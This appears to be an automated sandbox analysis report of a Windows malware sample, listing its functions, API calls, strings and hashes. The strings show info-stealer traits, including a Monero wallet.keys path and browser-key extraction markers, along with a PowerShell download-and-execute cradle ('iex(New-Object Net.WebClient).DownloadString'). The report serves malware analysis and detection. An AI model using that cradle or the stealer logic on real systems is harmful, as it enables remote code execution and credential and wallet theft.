                              Function 00934FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00934FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00934FD1
                              • InternetOpenA.WININET(00950DDF,00000000,00000000,00000000,00000000), ref: 00934FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00935011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00935041
                              • InternetCloseHandle.WININET(?), ref: 009350B9
                              • InternetCloseHandle.WININET(?), ref: 009350C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 8f696a8f1344d2f9acd573e6bf9023cafd39abfdd8873cb4b853a890bd4341b1
                              • Instruction ID: edf1c22dc5fb554e36f726ffc3feaebabe6d9c8ea52644d1ddca4bbac48b76b8
                              • Opcode Fuzzy Hash: 8f696a8f1344d2f9acd573e6bf9023cafd39abfdd8873cb4b853a890bd4341b1
                              • Instruction Fuzzy Hash: 653119B4A40218ABDB24CF54DC85BDCB7B4EB88704F1081D8FA09A7280DB746EC58F99
                              Function 00948100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,010FDAF8,00000000,?,00950E2C,00000000,?,00000000), ref: 00948130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00948137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00948158
                              • wsprintfA.USER32 ref: 009481AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: 9f30998a15c3ca47ae9a3de843b8c4714630a91ef4359eb4781c9eb07b7477aa
                              • Instruction ID: 88aa9ccf6dfc2862786d6957686e13484d38c00e966458828e76932e676f4886
                              • Opcode Fuzzy Hash: 9f30998a15c3ca47ae9a3de843b8c4714630a91ef4359eb4781c9eb07b7477aa
                              • Instruction Fuzzy Hash: C421FEB1E44218ABDB00DFD5DC49FAFB7B8FB88B14F104519F605BB280DB7869018BA5
                              Function 009483DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00948426
                              • wsprintfA.USER32 ref: 00948459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0094847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0094848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00948499
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,010FDAE0,00000000,000F003F,?,00000400), ref: 009484EC
                              • lstrlen.KERNEL32(?), ref: 00948501
                              • RegQueryValueExA.ADVAPI32(00000000,010FDC48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00950B34), ref: 00948599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00948608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0094861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 2faf2d7e71e690e97b99da330024e7815e1d8f6fda5e77046e9d7664cdbdd126
                              • Instruction ID: c279d307341c546c139fcc1f9e2b5bf024ed3a76039cdaa74fec16845889a1ab
                              • Opcode Fuzzy Hash: 2faf2d7e71e690e97b99da330024e7815e1d8f6fda5e77046e9d7664cdbdd126
                              • Instruction Fuzzy Hash: F821E7B1950218ABDB64DB54DC85FE9B3B8FB88704F00C598E609A7180DF71AA85CFD5
                              Function 00947690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009476A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009476AB
                              • RegOpenKeyExA.ADVAPI32(80000002,010EB760,00000000,00020119,00000000), ref: 009476DD
                              • RegQueryValueExA.ADVAPI32(00000000,010FDD08,00000000,00000000,?,000000FF), ref: 009476FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00947708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: bede20ba15109c0659173b02a57f68f5196b292f9e2297d0bdc772ca0afbcee0
                              • Instruction ID: 5f9b5a8ebc127afed2614fbeef4c67ac4873f25543e51646a63307c4c752567f
                              • Opcode Fuzzy Hash: bede20ba15109c0659173b02a57f68f5196b292f9e2297d0bdc772ca0afbcee0
                              • Instruction Fuzzy Hash: 02014FB5A44208BBDB00DBE4DC59F6DB7BCEB88701F104454FA0897291EB7499448B52
                              Function 00947720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0094773B
                              • RegOpenKeyExA.ADVAPI32(80000002,010EB760,00000000,00020119,009476B9), ref: 0094775B
                              • RegQueryValueExA.ADVAPI32(009476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0094777A
                              • RegCloseKey.ADVAPI32(009476B9), ref: 00947784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 438eb817bceb6ba0e5b950d85feb736e8882bd4afd5d57c14059b01128c3c6ea
                              • Instruction ID: cd03750ae59f274a97928e6944c9052fb6d9e7488645c4408506e481f81d07bc
                              • Opcode Fuzzy Hash: 438eb817bceb6ba0e5b950d85feb736e8882bd4afd5d57c14059b01128c3c6ea
                              • Instruction Fuzzy Hash: FF0117F5A40308BBD750DFE4DC49FAEB7B8EB84705F104555FA09A72C1DB705A408B52
                              Function 009399C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                              • LocalFree.KERNEL32(0093148F), ref: 00939A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 61e133aef6c726cb3e149aa5816c1413b27bce4d24682f699fd871cfa03f35b6
                              • Instruction ID: 274620ba0bfc716ec1011ac9a8704f8d4a342d41135a41948a8dbe0cc225881f
                              • Opcode Fuzzy Hash: 61e133aef6c726cb3e149aa5816c1413b27bce4d24682f699fd871cfa03f35b6
                              • Instruction Fuzzy Hash: 74311C74A00209EFDF14DF94D985FAE77B9FF88341F108258E915A7290DB74AA81CFA1
                              Function 00944780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,010FDE88), ref: 009447DB
                                • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00944801
                              • lstrcat.KERNEL32(?,?), ref: 00944820
                              • lstrcat.KERNEL32(?,?), ref: 00944834
                              • lstrcat.KERNEL32(?,010EB188), ref: 00944847
                              • lstrcat.KERNEL32(?,?), ref: 0094485B
                              • lstrcat.KERNEL32(?,010FD340), ref: 0094486F
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 00948D90: GetFileAttributesA.KERNEL32(00000000,?,00931B54,?,?,0095564C,?,?,00950E1F), ref: 00948D9F
                                • Part of subcall function 00944570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00944580
                                • Part of subcall function 00944570: RtlAllocateHeap.NTDLL(00000000), ref: 00944587
                                • Part of subcall function 00944570: wsprintfA.USER32 ref: 009445A6
                                • Part of subcall function 00944570: FindFirstFileA.KERNEL32(?,?), ref: 009445BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 548bf943f05bc5fae1c7e23359e6d5baa8b413087c674ad3490840a6dc1ac4af
                              • Instruction ID: 0a887099ca7be99f67b51fd8c85a6fc515f32f1c9d7e78b7e67f409850345b10
                              • Opcode Fuzzy Hash: 548bf943f05bc5fae1c7e23359e6d5baa8b413087c674ad3490840a6dc1ac4af
                              • Instruction Fuzzy Hash: 6D3141B290021867CB54FBB0DC85FEE737CAB98700F404989F35996191EE74A7C98B96
                              Function 00942C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00942D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00942CC4
                              • ')", xrefs: 00942CB3
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00942D04
                              • <, xrefs: 00942D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: c4eaab5251fd0dacf35a727a29254fbddacee558d975840e670c42eafe30329f
                              • Instruction ID: 8e3bdcb1562a49851e8f7ded10a43564eff67b3c59771b9d607be2e5fad8b45e
                              • Opcode Fuzzy Hash: c4eaab5251fd0dacf35a727a29254fbddacee558d975840e670c42eafe30329f
                              • Instruction Fuzzy Hash: 9941CA71C502089AEB14EBA0C892FEDBB78BF94304F504119F416A7192EF746A4ACF96
                              Function 00939E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00939F41
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: a09fcc1b97109f0665aed2a28e188beb30f9216d4b5b17e49cd757d932bf5eb2
                              • Instruction ID: 65168220d856abd56ba6b9c53bba1a94afdb045fb388d3d64cf52fa991fa3d89
                              • Opcode Fuzzy Hash: a09fcc1b97109f0665aed2a28e188beb30f9216d4b5b17e49cd757d932bf5eb2
                              • Instruction Fuzzy Hash: 86612E71A50248EBDB28EFA4CC96FED7775AF85304F008518F90A5F291EB746A06CF52
                              Function 009440B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,010FD1C0,00000000,00020119,?), ref: 009440F4
                              • RegQueryValueExA.ADVAPI32(?,010FDDE0,00000000,00000000,00000000,000000FF), ref: 00944118
                              • RegCloseKey.ADVAPI32(?), ref: 00944122
                              • lstrcat.KERNEL32(?,00000000), ref: 00944147
                              • lstrcat.KERNEL32(?,010FDDF8), ref: 0094415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
